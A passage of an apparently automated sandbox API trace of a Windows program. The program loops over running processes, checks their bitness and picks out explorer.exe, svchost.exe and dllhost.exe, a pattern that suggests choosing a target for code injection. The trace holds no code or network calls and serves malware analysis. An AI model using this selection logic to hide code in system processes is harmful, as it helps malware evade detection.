IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.487] CloseHandle (hObject=0xd8) returned 1 [0252.487] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0252.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0252.488] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.488] CloseHandle (hObject=0xd8) returned 1 [0252.488] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0252.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0252.488] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.488] CloseHandle (hObject=0xd8) returned 1 [0252.488] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0252.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0252.489] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.489] CloseHandle (hObject=0xd8) returned 1 [0252.489] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0252.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0252.489] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.489] CloseHandle (hObject=0xd8) returned 1 [0252.489] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0252.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0252.490] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.490] CloseHandle (hObject=0xd8) returned 1 [0252.490] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0252.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0252.490] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.491] CloseHandle (hObject=0xd8) returned 1 [0252.491] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0252.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0252.491] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.491] CloseHandle (hObject=0xd8) returned 1 [0252.491] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0252.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0252.492] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.492] CloseHandle (hObject=0xd8) returned 1 [0252.492] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0252.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0252.492] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.492] CloseHandle (hObject=0xd8) returned 1 [0252.492] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0252.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0252.493] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.493] CloseHandle (hObject=0xd8) returned 1 [0252.493] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0252.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0252.493] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.493] CloseHandle (hObject=0xd8) returned 1 [0252.493] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0252.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0252.494] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.494] CloseHandle (hObject=0xd8) returned 1 [0252.494] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0252.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0252.495] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.495] CloseHandle (hObject=0xd8) returned 1 [0252.495] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0252.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0252.495] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.495] CloseHandle (hObject=0xd8) returned 1 [0252.495] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0252.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0252.496] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.496] CloseHandle (hObject=0xd8) returned 1 [0252.496] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0252.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0252.496] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.496] CloseHandle (hObject=0xd8) returned 1 [0252.496] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0252.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0252.497] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.497] CloseHandle (hObject=0xd8) returned 1 [0252.497] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0252.498] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0252.498] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0252.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0252.499] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0252.499] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0252.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0252.500] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0252.500] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.500] CloseHandle (hObject=0xd8) returned 1 [0252.500] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0252.500] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0252.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0252.501] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.501] CloseHandle (hObject=0xd8) returned 1 [0252.501] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0252.501] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0252.501] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0252.501] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0252.501] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0252.502] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.502] CloseHandle (hObject=0xd8) returned 1 [0252.502] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0252.502] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.502] CloseHandle (hObject=0xd8) returned 1 [0252.503] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0252.503] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0252.503] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.503] CloseHandle (hObject=0xd8) returned 1 [0252.503] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.504] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0252.504] CloseHandle (hObject=0xd4) returned 1 [0252.504] Sleep (dwMilliseconds=0x3e8) [0253.509] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0253.510] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0253.511] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0253.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0253.511] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0253.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0253.512] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0253.512] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0253.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0253.513] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0253.513] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0253.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0253.514] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0253.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0253.514] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0253.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0253.515] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0253.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0253.515] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0253.516] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0253.516] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0253.517] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0253.517] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0253.518] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0253.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0253.518] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0253.519] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0253.519] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0253.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0253.520] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.520] CloseHandle (hObject=0xd8) returned 1 [0253.520] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0253.520] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0253.520] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0253.520] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0253.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0253.520] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0253.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0253.521] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.521] CloseHandle (hObject=0xd8) returned 1 [0253.521] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0253.521] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0253.521] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0253.521] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0253.521] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, 